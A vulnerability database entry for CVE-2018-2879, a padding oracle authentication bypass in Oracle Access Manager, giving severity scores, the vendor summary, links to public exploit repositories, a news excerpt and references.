Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
6.8
CVSSv2

CVE-2018-2879

Published: 19/04/2018 Updated: 03/10/2019
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
CVSS v3 Base Score: 9 | Impact Score: 6 | Exploitability Score: 2.2
VMScore: 606
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Subscribe to Oracle

Vulnerability Summary

Vulnerability in the Oracle Access Manager component of Oracle Fusion Middleware (subcomponent: Authentication Engine). Supported versions that are affected are 11.1.2.3.0 and 12.2.1.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. While the vulnerability is in Oracle Access Manager, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Access Manager. Note: Please refer to Doc ID <a href="support.oracle.com/CSP/main/article?cmd=show&type=NOT&id=2386496.1">My Oracle Support Note 2386496.1 for instructions on how to address this issue. CVSS 3.0 Base Score 9.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H).

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

oracle access manager 11.1.2.3.0

oracle access manager 12.2.1.3.0

Github Repositories

https://github.com/AymanElSherif/oracle-oam-authentication-bypas-exploit

Exploit for Oracle Access Manager padding oracle vulnerability (CVE-2018-2879)

Oracle Access Manager (OAM) Authentication Bypass Exploit Introduction Exploiting Oracle Access Manager (OAM) padding oracle vulnerability (CVE-2018-2879) to perform authentication bypass and login to any web app protected by OAM using valid username This exploit is based on OAM padding oracle vulnerability discovered by SEC Consult and was tested on OAM v122130 ww

https://github.com/MostafaSoliman/Oracle-OAM-Padding-Oracle-CVE-2018-2879-Exploit

Oracle-OAM-Padding-Oracle-CVE-2018-2879-Exploit Introduction This exploit was developed during pentesting activity against oracle OAM 111230 It was developed based on the technical description by sec-consult wwwsec-consultcom/en/blog/2018/05/oracle-access-managers-identity-crisis/ Requirments The exploit depend on python-pa

https://github.com/redtimmy/OAMBuster

Multithreaded Padding Oracle Attack on Oracle OAM (CVE-2018-2879)

OAMBuster Multithreaded Padding Oracle Attack on Oracle OAM (CVE-2018-2879) Authors Red Timmy (Marco Ortisi, Stefan Broeder, Ahmad Mahfouz) Description This multithreaded exploit was developed to greatly increase the speed of the attack as compared to the single threaded version For more information about the technical details of the attack, see this blog post by SEC Consult:

Recent Articles

Oracle Access Manager is a terrible doorman: Get patching this bug
The Register • Shaun Nichols in San Francisco • 03 May 2018

Security tool can be gamed to let any old riffraff into data

A security vulnerability in Oracle Access Manager leaves the network authentication tool leaning more toward "access" than "manager." The flaw, classified as CVE-2018-2879, can be exploited by a remote attacker to bypass an Oracle Access Manager (OAM) authentication screen and, in the process, take over the account of any user or administrator on a vulnerable system. Designed to manage remote connections to cloud and mobile apps via a single sign-on page, with multi-factor authentication, OAM is...

Read more...

References

NVD-CWE-noinfohttp://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.htmlhttp://www.securitytracker.com/id/1040695http://www.securityfocus.com/bid/103788https://www.sec-consult.com/en/blog/2018/05/oracle-access-managers-identity-crisis/https://github.com/MostafaSoliman/Oracle-OAM-Padding-Oracle-CVE-2018-2879-Exploithttps://seclists.org/bugtraq/2019/Apr/27http://packetstormsecurity.com/files/152551/OAMbuster-Multi-Threaded-CVE-2018-2879-Scanner.htmlhttp://seclists.org/fulldisclosure/2019/Apr/28https://nvd.nist.govhttps://github.com/AymanElSherif/oracle-oam-authentication-bypas-exploithttps://www.theregister.co.uk/2018/05/03/oracle_access_manager_vulnerability/
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-32744privilege escalationCVE-2024-30253CVE-2024-3914cross-site scriptingCVE-2024-31497CVE-2024-3400CVE-2024-32341hardcoded
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook